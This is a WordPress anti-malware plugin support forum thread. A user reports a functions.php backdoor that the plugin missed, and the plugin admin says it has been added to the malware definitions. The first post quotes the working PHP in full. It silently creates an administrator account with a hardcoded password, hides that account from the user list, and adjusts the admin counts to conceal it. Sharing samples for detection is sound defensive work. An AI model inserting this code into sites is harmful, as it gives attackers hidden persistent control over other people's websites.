Auto creation of malicious admin account not detected by plugin

Home Forums Support Forum Auto creation of malicious admin account not detected by plugin

This topic contains 2 replies, has 2 voices, and was last updated by  Ryan Thompson 2 years ago.

Viewing 3 posts - 1 through 3 (of 3 total)
  • Author
    Posts
  • #81808

    I just cleaned up a site and there were a few items missed by the plugin including the following devious admin account creation and hiding in the functions.php file –

    function wpb_admin_account(){   $user = ‘wpadminas’;   $pass = ‘OpF^MJrUK$SzYcOrfG’;   $email = ‘email@email.em’;   if ( !username_exists( $user )  && !email_exists( $email ) ) {      $user_id = wp_create_user( $user, $pass, $email );      $user = new WP_User( $user_id );      $user->set_role( ‘administrator’ );   }}add_action(‘init’,'wpb_admin_account’);add_action(‘pre_user_query’,'yoursite_pre_user_query’);function yoursite_pre_user_query($user_search) {   global $current_user;   $username = $current_user->user_login;   if ($username != ‘codepapa’) {      global $wpdb;      $user_search->query_where = str_replace(‘WHERE 1=1′,      ”WHERE 1=1 AND {$wpdb->users}.user_login != ‘wpadminas’”,$user_search->query_where);   }}add_filter(“views_users”, “dt_list_table_views”);function dt_list_table_views($views){   $users = count_users();   $admins_num = $users['avail_roles']['administrator'] – 1;   $all_num = $users['total_users'] – 1;   $class_adm = ( strpos($views['administrator'], ‘current’) === false ) ? “” : “current”;   $class_all = ( strpos($views['all'], ‘current’) === false ) ? “” : “current”;   $views['administrator'] = ‘<a href=”users.php?role=administrator” class=”‘ . $class_adm . ‘”>’ . translate_user_role(‘Administrator’) . ‘ <span class=”count”>(‘ . $admins_num . ‘)</span></a>’;   $views['all'] = ‘<a href=”users.php” class=”‘ . $class_all . ‘”>’ . __(‘All’) . ‘ <span class=”count”>(‘ . $all_num . ‘)</span></a>’;   return $views;}

    #85202

    Anti-Malware Admin
    Key Master

    Thanks so much for sending me this file. I have added this new variant of this malicious script injection into my latest definition update so that it can now be automatically removed using my plugin. Please download the latest definitions and let me know if you find any more.

    #85203

    Your very welcome. Thank you for maintaining such as great tool to help fight against malware. I have been using your plugin for years.

Viewing 3 posts - 1 through 3 (of 3 total)

You must be logged in to reply to this topic.

Comments are closed.